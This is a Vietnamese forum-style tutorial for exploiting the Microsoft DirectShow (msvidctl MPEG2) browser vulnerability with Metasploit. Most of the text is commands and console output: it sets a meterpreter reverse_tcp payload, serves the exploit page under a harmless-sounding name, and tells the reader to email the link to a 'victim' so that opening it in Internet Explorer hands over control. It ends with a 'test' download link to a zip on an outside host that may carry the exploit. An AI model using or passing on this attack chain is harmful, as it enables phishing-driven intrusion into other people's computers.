hướng dẫn khai thác 0-day in Microsoft DirectShow với metasploit:
em bắt đầu bằng cách chạy msfconsole sau khi Metasploit đã cập nhật phiên bản mới nhất:
Code:
holiganvn@root:~/svn/msf3-dev$ sudo ./msfconsole
[sudo] password for holiganvn:
| | _) |
__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|
| | | __/ | ( |\__ \ | | | ( | | |
_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
_|
=[ msf v3.3-dev
+ -- --=[ 384 exploits - 261 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 166 aux
msf >
em nạp mô-đun khai thác:
Code:
msf > use exploit/windows/browser/msvidctl_mpeg2
msf exploit(msvidctl_mpeg2) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(msvidctl_mpeg2) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Use SSL
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST yes The local address
LPORT 4444 yes The local port
Exploit target:
Id Name
-- ----
0 Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0
em thiết lập các biến Payload và Khai thác mô-đun:
Code:
msf exploit(msvidctl_mpeg2) > set SRVPORT 80
SRVPORT => 80
msf exploit(msvidctl_mpeg2) > set LHOST 192.168.1.158
LHOST => 192.168.1.158
msf exploit(msvidctl_mpeg2) > set URIPATH secure.html
URIPATH => secure.html
msf exploit(msvidctl_mpeg2) > exploit
[*] Exploit running as background job.
msf exploit(msvidctl_mpeg2) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using url: http://0.0.0.0:80/secure.html
[*] Local IP: http://192.168.1.158:80/secure.html
[*] Server started.
Bây giờ chúng ta có thể khai thác bug ở một tệp HTML với GIF để khai thác một mục tiêu. Bạn có thể gửi các liên kết đến một mục tiêu người sử dụng trong một thư điện tử hoặc thông qua bất cứ phương pháp khác và một khi người dùng nhấn vào liên kết và mở Internet Explorer,như vậy chúng ta đã có thể khai thác vào máy của victim:
link test:
Code:
http://fb.coru.in/0msvidctl.zip